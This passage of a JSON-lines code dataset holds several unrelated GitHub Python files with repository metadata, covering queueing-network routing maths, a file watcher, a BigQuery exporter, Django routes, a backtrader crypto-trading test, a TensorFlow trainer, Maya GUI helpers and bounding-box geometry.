return delay_matrix\n\n\ndef analytic_avg_delay_two_layers(arrival_rates, service_rates, delta, A):\n \"\"\"\n :param arrival_rates: arrival_rates (array, 1 by m size)\n :param service_rates: service_rates (array, 1 by n size)\n :param delta:\n :param A: routing probabilities (array m by n size)\n :return: expected service time including propagation delay considering just two layers\n \"\"\"\n\n m = len(arrival_rates)\n n = len(service_rates)\n lambda_hat = np.matmul(arrival_rates, A)\n res_sum = 0\n for i in range(m):\n res_sum += np.dot(A[i, :], 1 / (service_rates - lambda_hat) + delta[i, :]) * arrival_rates[i]\n return res_sum / sum(arrival_rates)\n\n\ndef analytic_avg_delay(rates, delta, routing_p, vol_dec):\n \"\"\"\n :param rates: [array (rates in layer 0), array (rates in layer 1), ...]\n :param delta:\n :param routing_p: routing probabilities [array (routing probabilites in layer 0), array (routing probabilites in layer 1), ...]\n :param vol_dec:\n :return: expected service time including propagation delay\n \"\"\"\n layer_num = len(rates)\n lambda_hat = [np.zeros((1, len(rates[i]))) for i in range(layer_num)]\n lambda_hat[0] = rates[0]\n for i in range(1, layer_num):\n lambda_hat[i] = np.matmul(lambda_hat[i - 1], routing_p[i - 1])\n test = rates[i] - lambda_hat[i]\n if test[test <= 0]:\n print(\"Initial A is wrong!\")\n return 1\n res_sum = 0\n for i in range(layer_num - 1):\n res_sum += analytic_avg_delay_two_layers(lambda_hat[i], rates[i + 1] / vol_dec[:i+1].prod(), delta[i], routing_p[i])\n return res_sum\n\n\ndef no_delay_optimal(arrival_rates, service_rates):\n '''\n \tFind the optimal completion time using Lagrange multiplier for a network without propagation delays\n \tconsidering only two layers\n '''\n n = len(service_rates)\n num = 0\n for j in range(n):\n num += sqrt(service_rates[j])\n denom = sum(service_rates) - sum(arrival_rates)\n K = pow(num / denom, 2)\n lambda_hat = np.zeros((n, 1))\n for j in range(n):\n lambda_hat[j] = service_rates[j] - sqrt(service_rates[j]/K)\n service_time = 0\n for j in range(n):\n service_time += lambda_hat[j] / (service_rates[j] - lambda_hat[j])\n service_time = service_time / sum(arrival_rates)\n result = {'lambda_hat': lambda_hat, 'Mean_completion_time': service_time}\n return result\n\n\ndef cur_vol(cur_layer_index, layer_dic, vol_dec):\n data_type_num = len(layer_dic.keys())\n res = np.ones(data_type_num)\n for i in range(data_type_num):\n for j in range(cur_layer_index + 1):\n res[i] *= vol_dec[i, j]\n return res\n\n\ndef effective_rates(arrival_rates, service_rates, cur_layer_index, layer_dic, data_dist, vol_dec):\n data_type_num = len(data_dist)\n effective_dist = np.zeros(data_type_num)\n data_vol = cur_vol(cur_layer_index, layer_dic, vol_dec)\n for i in range(data_type_num):\n if layer_dic[i].count(cur_layer_index + 1) > 0:\n effective_dist[i] = data_dist[i]\n eff_arrival_rates = arrival_rates * sum(effective_dist)\n eff_service_rates = service_rates / (np.dot(data_vol, effective_dist) / sum(effective_dist))\n return [eff_arrival_rates, eff_service_rates]\n\n\ndef grad_multi_layers(rates, delta, layer_dic, data_type_dist, vol_dec):\n layer_num = len(rates)\n optimal_a = []\n source_rates = rates[0]\n for l in range(layer_num - 2):\n temp_arr_rates = source_rates\n temp_ser_rates = rates[l + 1]\n eff_rates = effective_rates(temp_arr_rates, temp_ser_rates, l, layer_dic, data_type_dist, vol_dec)\n eff_arr_rates = eff_rates[0]\n eff_ser_rates = eff_rates[1]\n if sum(eff_arr_rates) == 0: # just passing through the layer\n temp_a = 
np.ones((len(eff_arr_rates), len(eff_ser_rates))) / len(eff_ser_rates)\n else:\n initial_a = valid_initial_rates(eff_arr_rates, eff_ser_rates, 0.9)\n temp_res = grad_projected(eff_arr_rates, eff_ser_rates, delta[l], initial_a)\n temp_a = temp_res['A']\n optimal_a.append(temp_a)\n source_rates = np.matmul(source_rates, temp_a)\n last_layer_num = len(rates[layer_num - 2])\n optimal_a.append(np.ones((last_layer_num, 1)))\n return optimal_a\n\n\ndef barrier_multi_layers(rates, delta, layer_dic, data_type_dist, vol_dec):\n layer_num = len(rates)\n optimal_a = []\n source_rates = rates[0]\n for l in range(layer_num - 2):\n temp_arr_rates = source_rates\n temp_ser_rates = rates[l + 1]\n eff_rates = effective_rates(temp_arr_rates, temp_ser_rates, l, layer_dic, data_type_dist, vol_dec)\n eff_arr_rates = eff_rates[0]\n eff_ser_rates = eff_rates[1]\n if sum(eff_arr_rates) == 0: # just passing through the layer\n temp_a = np.ones((len(eff_arr_rates), len(eff_ser_rates))) / len(eff_ser_rates)\n else:\n initial_a = valid_initial_rates(eff_arr_rates, eff_ser_rates, 0.9)\n temp_res = barrier_method(eff_arr_rates, eff_ser_rates, delta[l], initial_a)\n temp_a = temp_res['A']\n optimal_a.append(temp_a)\n source_rates = np.matmul(source_rates, temp_a)\n last_layer_num = len(rates[layer_num - 2])\n optimal_a.append(np.ones((last_layer_num, 1)))\n return optimal_a\n\n\ndef valid_initial_rates(source_rates, server_rates, para):\n \"\"\"\n :param source_rates: source rates (array)\n :param server_rates: server rates (array)\n :param para: parameter for finding initial rates\n :return: valid initial routing probabilities that guarantees queue stability\n \"\"\"\n eps = 0.001\n sources_num = len(source_rates)\n servers_num = len(server_rates)\n initial_a = eps * np.ones((sources_num, servers_num))\n for i in range(servers_num):\n temp = np.ones(sources_num) * para * server_rates[i] / np.sum(source_rates)\n initial_a[:, i] = np.minimum(temp, 1 - np.sum(initial_a, 1) + initial_a[:, i])\n source_rates = np.matmul(source_rates.reshape((1, sources_num)), initial_a).flatten()\n # print(server_rates - source_rates) # to check validity\n return initial_a\n\n\ndef legacy_optimal_routing(locations):\n \"\"\"\n :param locations: coordinates info for spatial distribution of nodes in the network\n :return: a, (list that consists of arrays) the optimal routing probability in the legacy network\n \"\"\"\n layer_num = len(locations)\n a = [np.zeros((len(locations[i]), len(locations[i + 1]))) for i in range(layer_num - 1)]\n for i in range(layer_num - 1):\n for j in range(len(locations[i])):\n delay_info = [delay(locations[i][j], locations[i + 1][k]) for k in range(len(locations[i + 1]))]\n min_delay_index = np.argmin(delay_info)\n a[i][j][min_delay_index] = 1\n return a\n\n\ndef bandwidth_efficiency(vol_dec, data_type_dist, layer_dic, source_rates):\n \"\"\"\n :param vol_dec: (array), volume decrease ratio after processing in each layer for each data type\n :param data_type_dist: (array), data type distribution\n :param layer_dic: (dictionary), required layer info for each data type\n :param source_rates: (array), source rates in the network\n :return: res, bandwidth efficiency which is proportion to the product of rate and data volume\n \"\"\"\n layer_num = np.size(vol_dec, axis=1)\n res = 0\n data_type_num = len(data_type_dist)\n departure_process_rate = sum(source_rates)\n for l in range(layer_num - 1):\n temp_dist = np.zeros(data_type_num)\n for i in range(data_type_num):\n temp_max_layer = max(layer_dic[i])\n if 
temp_max_layer > l:\n temp_dist[i] = data_type_dist[i]\n cur_vol_temp = cur_vol(l, layer_dic, vol_dec)\n avg_data_vol = np.dot(cur_vol_temp, temp_dist)\n res += avg_data_vol\n return departure_process_rate * res\n\n\ndef bandwidth_efficiency_compare(data_type_dist, source_rates, layer_dic, vol_dec):\n \"\"\"\n :param data_type_dist: (array), data type distribution\n :param source_rates: (array), source rates in the network\n :param layer_dic: (dictionary), required layer info for each data type\n :param vol_dec: (array), volume decrease ratio after processing in each layer for each data type\n :return: res, ratio of bandwidth usages between in-network processing and legacy networks\n \"\"\"\n data_type_num = len(data_type_dist)\n layer_num = np.size(vol_dec, axis=1)\n legacy_vol_dec = np.ones((data_type_num, layer_num))\n legacy_data_type_dist = np.array([1])\n legacy_layer_dic = {0: [0, layer_num - 1]}\n b_e_legacy = bandwidth_efficiency(legacy_vol_dec, legacy_data_type_dist, legacy_layer_dic, source_rates)\n b_e_in_network_processing = bandwidth_efficiency(vol_dec, data_type_dist, layer_dic, source_rates)\n res = b_e_in_network_processing / b_e_legacy\n return res\n\n\ndef avg_last_layer(data_type_dist, layer_dic):\n \"\"\"\n :param data_type_dist: (array), data type distribution\n :param layer_dic: (dictionary), required layer info for each data type\n :return: res, average last layer\n \"\"\"\n temp = list(layer_dic.values())\n temp_max = np.array([max(temp[i]) for i in range(len(data_type_dist))])\n res = np.dot(data_type_dist, temp_max)\n return res\n\n\ndef avg_sum_required_layer(data_type_dist, layer_dic):\n \"\"\"\n :param data_type_dist: (array), data type distribution\n :param layer_dic: (dictionary), required layer info for each data type\n :return: res, expected sum of the required layers\n \"\"\"\n temp = list(layer_dic.values())\n temp_sum = np.array([sum(temp[i]) for i in range(len(data_type_dist))])\n res = np.dot(data_type_dist, temp_sum)\n return res\n\n","repo_name":"Youngrock-Oh/Data_centric_network","sub_path":"Analytic_res.py","file_name":"Analytic_res.py","file_ext":"py","file_size_in_byte":10392,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74742277929","text":"import time\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\nclass TestHandler(FileSystemEventHandler):\n def on_any_event(self, event):\n print(f\"Event detected: {event}\")\n\nobserver = Observer()\nevent_handler = TestHandler()\nobserver.schedule(event_handler, path='C:\\\\Users\\\\oropesa\\\\Documents\\\\Magicus', recursive=True)\nobserver.start()\n\ntry:\n while True:\n time.sleep(1)\nexcept KeyboardInterrupt:\n observer.stop()\nobserver.join()\n#this is just a commentdsfgdggggbg","repo_name":"thepwnman33/Magicus","sub_path":"test_watch.py","file_name":"test_watch.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70275139690","text":"import pandas_gbq\n\n\nclass BigQueryExporter:\n def __init__(self, credentials, project_id, table_name):\n self.credentials = credentials\n self.project_id = project_id\n self.table_name = table_name\n\n def export(self, df):\n pandas_gbq.to_gbq(\n dataframe=df,\n destination_table=self.table_name,\n project_id=self.project_id,\n 
if_exists='append')\n","repo_name":"crazydev71/ga-export","sub_path":"jobs/exporters/big_query_exporter.py","file_name":"big_query_exporter.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26678415217","text":"from django.urls import path, include\nfrom . import views\nfrom .views import *\nfrom rest_framework import routers\n\nrouter = routers.SimpleRouter()\nrouter.register(r'books_api', views.BookViewSet)\nrouter.register(r\"author_books\", views.Author_BookViewSet)\nrouter.register(r\"author_book_detail\", views.Author_Book_DetailViewSet)\nrouter.register(r\"book_detail\", views.Book_DetailViewSet)\nrouter.register(r\"collection_API\", views.Collection_API_ReturnViewSet)\nrouter.register(r\"subject_book_API\", views.Subject_API_ReturnViewSet)\nrouter.register(r\"audiobook_api\", views.AudioBookViewSet, basename=\"audiobooks\")\n#router.register(r\"multiplebooks\", views.ReadingListSearchView, basename=\"readinglist\")\n\n#router.register(r\"booksearch\", views.BookSearch)\n\nurlpatterns = [\n path('', views.books),\n path('', include(router.urls)),\n path('booksearch/', views.BookSearch.as_view(), name=\"BookSearch\"),\n path('authorsearch/', views.AuthorSearch.as_view(), name=\"AuthorSearch\"),\n path('subjectsearch/', views.SubjectSearch.as_view(), name=\"SubjectSearch\"),\n path('collectionsearch/', views.CollectionSearch.as_view(), name=\"CollectionSearch\"),\n path('bookbyid/', views.BookById.as_view(), name=\"BookByID\"),\n path('collections/', views.Collections.as_view(), name=\"Collections\"),\n path(\"author_book//\", Author_BookAPIView.as_view(), name=\"AuthorBookLookup\"),\n path(\"collection_book//\", Collection_BookAPIView.as_view(), name=\"CollectionBookLookup\"),\n path(\"bookmetadata//\", BookMetaDataView.as_view(), name=\"MetaData\"),\n path(\"bookmetadatalookup//\", BookMetaDataLookupAPIView.as_view(), name=\"MetaDataLookup\"),\n path(\"audiobooks//\", AudioBookView.as_view(), name=\"AudioBookLookup\"),\n\n #path(\"collection_api/\", Collection_API_ReturnViewSet.as_view(), name=\"CollectionAPI\"),\n #path(\"testing/\", views.testAPI.as_view(), name=\"Testing\"),\n #path(\"author_book_detail\", Author_Book_DetailViewSet.as_view(), name=\"AuthorBookDetail\"),\n]\n","repo_name":"rdmullins/rm-ereader-backend","sub_path":"e_reader/ereader/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1784910433","text":"import sys\nimport os\nimport sys\nsys.path.append('.')\nfrom ccxtbt import CCXTStore\nimport backtrader as bt\nfrom utils.helper import init_env, get_env\nimport logging.config\nimport time\nfrom tools.telegram import Telegram\nfrom datetime import datetime, timedelta\n\n\nclass OneBuy(bt.Strategy):\n\n def __init__(self):\n self.m = 0\n\n def log(self, txt, dt=None):\n dt = dt or self.datas[0].datetime.datetime(0)\n print(f'{dt} {txt}') # Print date and close\n\n def notify_data(self, data, status, *args, **kwargs):\n dn = data._name\n msg = f'{dn} Data Status: {data._getstatusname(status)}'\n self.log(msg, datetime.utcnow())\n if data._getstatusname(status) == 'LIVE':\n self.live_data = True\n else:\n self.live_data = False\n\n def notify_order(self, order):\n self.log(\n f\"Order: {order.ordtypename()}, Status: {order.getstatusname()}, Price: {order.executed.price}, Size: {order.executed.size}, Alive: {order.alive()}\"\n )\n\n def 
next(self):\n if not self.live_data: return\n if self.m == 0:\n data = self.datas[0]\n self.buy(data)\n self.m = 1\n self.log(\"buy\")\n\n\nif __name__ == '__main__':\n\n init_env()\n logging.config.fileConfig(\"logging.ini\")\n logging.Formatter.converter = time.gmtime #utc\n cerebro = bt.Cerebro(quicknotify=True)\n\n # Add the strategy\n cerebro.addstrategy(OneBuy)\n cerebro.addanalyzer(Telegram)\n\n # Create our store\n config = { 'apiKey': get_env('B_APIKEY'), 'secret': get_env('B_SECRET'), 'enableRateLimit': True }\n if get_env(\"PROXY\") == '1':\n config['requests_trust_env'] = True\n\n # IMPORTANT NOTE - Kraken (and some other exchanges) will not return any values\n # for get cash or value if You have never held any BNB coins in your account.\n # So switch BNB to a coin you have funded previously if you get errors\n store = CCXTStore(exchange='binanceusdm', currency='USDT', config=config, retries=10, debug=False)\n\n # Get the broker and pass any kwargs if needed.\n # ----------------------------------------------\n # Broker mappings have been added since some exchanges expect different values\n # to the defaults. Case in point, Kraken vs Bitmex. NOTE: Broker mappings are not\n # required if the broker uses the same values as the defaults in CCXTBroker.\n broker_mapping = {\n 'order_types': {\n bt.Order.Market: 'market',\n bt.Order.Limit: 'limit',\n bt.Order.Stop: 'stop-loss', #stop-loss for kraken, stop for bitmex\n bt.Order.StopLimit: 'stop limit'\n },\n 'mappings': {\n 'closed_order': {\n 'key': 'status',\n 'value': 'closed'\n },\n 'canceled_order': {\n 'key': 'status',\n 'value': 'canceled'\n }\n }\n }\n\n broker = store.getbroker(broker_mapping=broker_mapping)\n cerebro.setbroker(broker)\n\n # Get our data\n # Drop newest will prevent us from loading partial data from incomplete candles\n hist_start_date = datetime.utcnow() - timedelta(minutes=(220 + 6) * 5)\n data = store.getdata(\n dataname='ETC/USDT',\n name=\"ETCUSDT\",\n timeframe=bt.TimeFrame.Minutes,\n fromdate=hist_start_date,\n compression=5,\n ohlcv_limit=99999,\n drop_newest=True,\n # historical=True\n )\n\n # Add the feed\n cerebro.adddata(data)\n\n cerebro.broker.setcommission(commission=0.0004, margin=0.1, mult=1.0)\n cerebro.addsizer(bt.sizers.FixedSize, stake=1)\n\n # Run the strategy\n cerebro.run()","repo_name":"xiangxn/backtrader-example","sub_path":"tests/test_live.py","file_name":"test_live.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"16364557095","text":"import sys \ninput = sys.stdin.readline\nn = int(input()) # 토핑 종류의 수 n\na, b = map(int, input().split()) # 도우의 가격 a , 토핑의 가격 b\nc = int(input()) # 도우의 열량 c\ntopping = [] # 토핑의 열량 리스트\nfor _ in range(n):\n topping.append(int(input()))\ntopping.sort(reverse=True) # 내림차순 정렬\n\nresult = c / a # 토핑을 0개 선택했을 경우\nfor i in range(1, len(topping)+1): # 토핑을 1개 이상 선택했을 경우\n calory = c + sum(topping[0:i]) # 피자의 열량\n price = a + (b*i) # 피자의 가격\n if calory / price > result: # max인지 판단\n result = calory / price\n else:\n break\n \nprint(int(result))","repo_name":"letmeloveyou82/Algorithm","sub_path":"Python/BOJ/그리디/5545.py","file_name":"5545.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10592226082","text":"from core.base_train import BaseTrain\nfrom tqdm import tqdm\nfrom misc.utils import SetFromFlat, GetFlat, unflatten, flatten, numel\nimport numpy as 
np\nimport tensorflow as tf\n\n\nclass Trainer(BaseTrain):\n def __init__(self, sess, model, train_loader, test_loader, config, logger):\n super(Trainer, self).__init__(sess, model, config, logger)\n self.train_loader = train_loader\n self.test_loader = test_loader\n\n self.get_params = GetFlat(self.sess, self.model.params_net)\n self.set_params = SetFromFlat(self.sess, self.model.params_net)\n self.unflatten = unflatten(self.model.params_net)\n self.norm_list = []\n\n self.summary_op = tf.summary.merge_all()\n\n def init_kfac(self):\n self.logger.info('Roger Initialization!')\n self.model.optim._fisher_est.reset(self.sess)\n\n for itr, (x, y) in enumerate(self.train_loader):\n feed_dict = {\n self.model.inputs: x,\n # self.model.targets: y,\n self.model.is_training: True\n }\n self.sess.run(self.model.optim.init_cov_op, feed_dict=feed_dict)\n self.model.optim._fisher_est.rescale(self.sess, 1. / len(self.train_loader))\n\n # inverse\n if self.model.inv_update_op is not None:\n self.sess.run(self.model.inv_update_op)\n\n self.logger.info('Done Roger Initialization!')\n\n def train(self):\n if self.config.roger_init:\n self.init_kfac()\n for cur_epoch in range(self.config.epoch):\n self.logger.info('epoch: {}'.format(int(cur_epoch)))\n self.train_epoch()\n self.test_epoch()\n\n if cur_epoch % 100 == 0:\n self.model.save(self.sess)\n\n def train_epoch(self):\n loss_list = []\n acc_list = []\n\n for itr, (x, y) in enumerate(tqdm(self.train_loader)):\n feed_dict = {\n self.model.inputs: x,\n self.model.targets: y,\n self.model.is_training: True,\n }\n self.sess.run(self.model.train_op, feed_dict=feed_dict)\n cur_iter = self.model.global_step_tensor.eval(self.sess)\n\n if cur_iter % self.config.get('TCov', 10) == 0 and self.model.cov_update_op is not None:\n self.sess.run(self.model.cov_update_op, feed_dict=feed_dict)\n\n if cur_iter % self.config.get('TInv', 100) == 0 and self.model.inv_update_op is not None:\n self.sess.run(self.model.inv_update_op)\n\n for itr, (x, y) in enumerate(self.train_loader):\n feed_dict = {\n self.model.inputs: x,\n self.model.targets: y,\n self.model.is_training: True\n }\n\n loss, acc = self.sess.run(\n [self.model.loss, self.model.acc],\n feed_dict=feed_dict)\n loss_list.append(loss)\n acc_list.append(acc)\n\n avg_loss = np.mean(loss_list)\n avg_acc = np.mean(acc_list)\n self.logger.info(\"[Train] loss: %5.4f | accuracy: %5.4f\"%(float(avg_loss), float(avg_acc)))\n\n l2_norm = self.sess.run(self.model.l2_norm)\n self.logger.info(\"l2_norm: %5.4f\"%(float(l2_norm)))\n\n # summarize\n summaries_dict = dict()\n summaries_dict['train_loss'] = avg_loss\n summaries_dict['train_acc'] = avg_acc\n summaries_dict['l2_norm'] = l2_norm\n\n # summarize\n cur_iter = self.model.global_step_tensor.eval(self.sess)\n self.summarizer.summarize(cur_iter, summaries_dict=summaries_dict)\n\n def test_epoch(self):\n loss_list = []\n acc_list = []\n for (x, y) in self.test_loader:\n feed_dict = {\n self.model.inputs: x,\n self.model.targets: y,\n self.model.is_training: False\n }\n loss, acc = self.sess.run([self.model.loss, self.model.acc], feed_dict=feed_dict)\n loss_list.append(loss)\n acc_list.append(acc)\n\n avg_loss = np.mean(loss_list)\n avg_acc = np.mean(acc_list)\n self.logger.info(\"[Test] loss: %5.4f | accuracy: %5.4f\"%(float(avg_loss), float(avg_acc)))\n\n # summarize\n summaries_dict = dict()\n summaries_dict['test_loss'] = avg_loss\n summaries_dict['test_acc'] = avg_acc\n\n # summarize\n cur_iter = self.model.global_step_tensor.eval(self.sess)\n 
self.summarizer.summarize(cur_iter, summaries_dict=summaries_dict)\n\n\n","repo_name":"gd-zhang/Weight-Decay","sub_path":"core/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"70700699047","text":"from PySide import QtCore, QtGui\nfrom functools import partial\n\ndef add_spinbox(label, parent_layout, min=None, max=None, default=None, double_spinbox=False):\n \n horiz_layout = QtGui.QHBoxLayout()\n parent_layout.addLayout(horiz_layout)\n\n label = QtGui.QLabel(label)\n label.setMinimumWidth(100)\n horiz_layout.addWidget(label)\n\n horiz_layout.addStretch()\n\n spinbox = QtGui.QSpinBox() if not double_spinbox else QtGui.QDoubleSpinBox()\n\n if min:\n spinbox.setMinimum(min)\n if max:\n spinbox.setMaximum(max)\n if default:\n spinbox.setValue(default)\n\n\n horiz_layout.addWidget(spinbox)\n spinbox.setMinimumWidth(100)\n\n return spinbox\n\n\ndef add_populate_lineedit(label, parent_layout, callback=None, kwargs={}):\n \n horiz_layout = QtGui.QHBoxLayout()\n parent_layout.addLayout(horiz_layout)\n\n button = QtGui.QPushButton(label)\n button.setMinimumWidth(80)\n horiz_layout.addWidget(button)\n\n lineedit = QtGui.QLineEdit()\n horiz_layout.addWidget(lineedit)\n lineedit.setMinimumWidth(100)\n\n \n if callback is not None:\n \n kwargs['lineedit'] = lineedit\n button.clicked.connect(partial(callback, **kwargs))\n\n return lineedit","repo_name":"EriLee/petfactory_maya_scripts","sub_path":"petfactory/gui/simple_widget.py","file_name":"simple_widget.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"72271213287","text":"from typing import Optional, Tuple, Union\n\nimport numpy as np\nimport torch\n\nfrom cap.core.point_geometry import coor_transformation\n\n__all__ = [\n \"box_center_to_corner\",\n \"box_corner_to_center\",\n \"bbox_overlaps\",\n \"get_bev_bbox\",\n \"zoom_boxes\",\n]\n\n\ndef box_center_to_corner(\n bboxes: torch.Tensor,\n split: Optional[bool] = False,\n legacy_bbox: Optional[bool] = False,\n): # noqa: D205,D400\n \"\"\"\n Convert bounding box from center format (xcenter, ycenter,\n width, height) to corner format (x_low, y_low, x_high, y_high)\n\n Args:\n bboxes (torch.Tensor): Shape is (..., 4) represents bounding boxes.\n split: (:obj:`bool`, optional): Whether to split the final output to\n for (..., 1) tensors, or keep the (..., 4) original output.\n Default to False.\n legacy_bbox: (:obj:`bool`, optional): Whether the boxes are decoded\n in legacy manner (should add one to bottom or right coordinate\n before using) or not. 
Default to False.\n \"\"\"\n\n border = int(legacy_bbox)\n cx, cy, w, h = torch.split(bboxes, 1, dim=-1)\n x1 = cx - (w - border) * 0.5\n y1 = cy - (h - border) * 0.5\n x2 = x1 + w - border\n y2 = y1 + h - border\n\n if split:\n return x1, y1, x2, y2\n else:\n return torch.cat([x1, y1, x2, y2], dim=-1)\n\n\ndef box_corner_to_center(\n bboxes: torch.Tensor,\n split: Optional[bool] = False,\n legacy_bbox: Optional[bool] = False,\n): # noqa: D205,D400\n \"\"\"\n Convert bounding box from corner format (x_low, y_low, x_high, y_high)\n to center format (xcenter, ycenter, width, height)\n\n Args:\n bboxes (torch.Tensor): Shape is (..., 4) represents bounding boxes.\n split: (:obj:`bool`, optional): Whether to split the final output to\n for (..., 1) tensors, or keep the (..., 4) original output.\n Default to False.\n legacy_bbox: (:obj:`bool`, optional): Whether the boxes are decoded\n in legacy manner (should add one to bottom or right coordinate\n before using) or not. Default to False.\n \"\"\"\n\n border = int(legacy_bbox)\n x1, y1, x2, y2 = torch.split(bboxes, 1, dim=-1)\n width = x2 - x1 + border\n height = y2 - y1 + border\n cx = x1 + (width - border) * 0.5\n cy = y1 + (height - border) * 0.5\n\n if split:\n return cx, cy, width, height\n else:\n return torch.cat([cx, cy, width, height], dim=-1)\n\n\ndef bbox_overlaps(\n bboxes1: Union[torch.tensor, np.ndarray],\n bboxes2: Union[torch.tensor, np.ndarray],\n mode: Optional[str] = \"iou\",\n is_aligned: Optional[bool] = False,\n eps: Optional[float] = 1e-6,\n):\n \"\"\"\n Calculate overlap between two set of bboxes.\n\n Args:\n bboxes1 (Tensor or np.ndarray):\n shape (m, 4) in format or empty.\n bboxes2 (Tensor or np.ndarray):\n shape (n, 4) in format or empty.\n mode (str): \"iou\" (intersection over union), \"iof\" (intersection over\n foreground) or \"giou\" (generalized intersection over union).\n Default \"iou\".\n is_aligned (bool, optional): If True, then m and n must be equal.\n Default False.\n eps (float, optional): A value added to the denominator for numerical\n stability. 
Default 1e-6.\n\n Returns:\n Tensor: shape (m, n) if ``is_aligned `` is False else shape (m,)\n \"\"\"\n\n assert isinstance(bboxes1, type(bboxes2))\n is_ndarray = False\n if isinstance(bboxes1, np.ndarray):\n is_ndarray = True\n bboxes1 = torch.from_numpy(bboxes1)\n bboxes2 = torch.from_numpy(bboxes2)\n\n assert mode in [\"iou\", \"iof\", \"giou\"], f\"Unsupported mode {mode}\"\n # Either the boxes are empty or the length of boxes' last dimension is 4\n assert bboxes1.size(-1) == 4 or bboxes1.size(0) == 0\n assert bboxes2.size(-1) == 4 or bboxes2.size(0) == 0\n\n rows = bboxes1.size(0)\n cols = bboxes2.size(0)\n\n if is_aligned:\n assert rows == cols\n\n if rows * cols == 0:\n if is_aligned:\n return bboxes1.new_zeros((rows,))\n else:\n return bboxes1.new_zeros((rows, cols))\n\n area1 = (bboxes1[..., 2] - bboxes1[..., 0]) * (\n bboxes1[..., 3] - bboxes1[..., 1]\n )\n area2 = (bboxes2[..., 2] - bboxes2[..., 0]) * (\n bboxes2[..., 3] - bboxes2[..., 1]\n )\n\n if is_aligned:\n lt = torch.max(bboxes1[..., :2], bboxes2[..., :2]) # [rows, 2]\n rb = torch.min(bboxes1[..., 2:], bboxes2[..., 2:]) # [rows, 2]\n\n wh = (rb - lt).clamp(min=0)\n overlap = wh[..., 0] * wh[..., 1]\n\n if mode in [\"iou\", \"giou\"]:\n union = area1 + area2 - overlap\n else:\n union = area1\n if mode == \"giou\":\n enclosed_lt = torch.min(bboxes1[..., :2], bboxes2[..., :2])\n enclosed_rb = torch.max(bboxes1[..., 2:], bboxes2[..., 2:])\n else:\n lt = torch.max(\n bboxes1[:, None, :2], bboxes2[None, :, :2]\n ) # [rows, cols, 2]\n rb = torch.min(\n bboxes1[:, None, 2:], bboxes2[None, :, 2:]\n ) # [rows, cols, 2]\n wh = (rb - lt).clamp(min=0)\n overlap = wh[..., 0] * wh[..., 1]\n if mode in [\"iou\", \"giou\"]:\n union = area1[..., None] + area2[..., None, :] - overlap\n else:\n union = area1[..., None]\n if mode == \"giou\":\n enclosed_lt = torch.min(bboxes1[:, None, :2], bboxes2[None, :, :2])\n enclosed_rb = torch.max(bboxes1[:, None, 2:], bboxes2[None, :, 2:])\n\n eps = union.new_tensor([eps])\n union = torch.max(union, eps)\n ious = overlap / union\n if mode in [\"iou\", \"iof\"]:\n return ious if not is_ndarray else ious.numpy()\n # calculate gious\n enclose_wh = (enclosed_rb - enclosed_lt).clamp(min=0)\n enclose_area = enclose_wh[..., 0] * enclose_wh[..., 1]\n enclose_area = torch.max(enclose_area, eps)\n gious = ious - (enclose_area - union) / enclose_area\n return gious if not is_ndarray else gious.numpy()\n\n\n# =============================================================================\n# The following methods are mostly used in lidar 3d box processing.\n# =============================================================================\n\n\ndef corners_nd(\n dims: np.ndarray, origin: Union[Tuple[float, ...], float] = 0.5\n):\n \"\"\"Generate relative box corners based on length per dim and origin point.\n\n Args:\n dims (np.ndarray): [N, ndim] tensor. Box size in each dimension.\n origin ([Union[Tuple[float, ...], float]):\n origin point relative to the smallest point. 
Defaults to 0.5.\n\n Returns:\n corners (np.ndarray): [N, 2**ndim, ndim] sized tensor of corners.\n point layout example: (2d) x0y0, x0y1, x1y0, x1y1;\n (3d) x0y0z0, x0y0z1, x0y1z0, x0y1z1, x1y0z0, x1y0z1, x1y1z0, x1y1z1\n where x0 < x1, y0 < y1, z0 < z1\n \"\"\"\n ndim = int(dims.shape[1])\n corners_norm = np.stack(\n np.unravel_index(np.arange(2 ** ndim), [2] * ndim), axis=1\n ).astype(dims.dtype)\n # now corners_norm has format: (2d) x0y0, x0y1, x1y0, x1y1\n # (3d) x0y0z0, x0y0z1, x0y1z0, x0y1z1, x1y0z0, x1y0z1, x1y1z0, x1y1z1\n # so need to convert to a format which is convenient to do other computing.\n # for 2d boxes, format is clockwise start with minimum point\n # for 3d boxes, please draw lines by your hand.\n if ndim == 2:\n # generate clockwise box corners\n corners_norm = corners_norm[[0, 1, 3, 2]]\n elif ndim == 3:\n corners_norm = corners_norm[[0, 1, 3, 2, 4, 5, 7, 6]]\n corners_norm = corners_norm - np.array(origin, dtype=dims.dtype)\n corners = dims.reshape([-1, 1, ndim]) * corners_norm.reshape(\n [1, 2 ** ndim, ndim]\n )\n return corners\n\n\ndef rotation_2d(points: np.ndarray, angles: float):\n \"\"\"Rotate 2d points based on origin point clockwise when angle positive.\n\n Args:\n points (float array, shape=[N, point_size, 2]): points to be rotated.\n angles (float array, shape=[N]): rotation angle.\n\n Returns:\n float array: same shape as points\n \"\"\"\n rot_sin = np.sin(angles)\n rot_cos = np.cos(angles)\n rot_mat_T = np.stack([[rot_cos, -rot_sin], [rot_sin, rot_cos]])\n return np.einsum(\"aij,jka->aik\", points, rot_mat_T)\n\n\ndef center_to_corner_box2d(\n centers: np.ndarray,\n dims: np.ndarray,\n angles: Optional[np.ndarray] = None,\n origin: float = 0.5,\n):\n \"\"\"Convert Kitti-style locations, dimensions and angles to corners.\n\n format: center(xy), dims(xy), angles(clockwise when positive)\n\n Args:\n centers (float 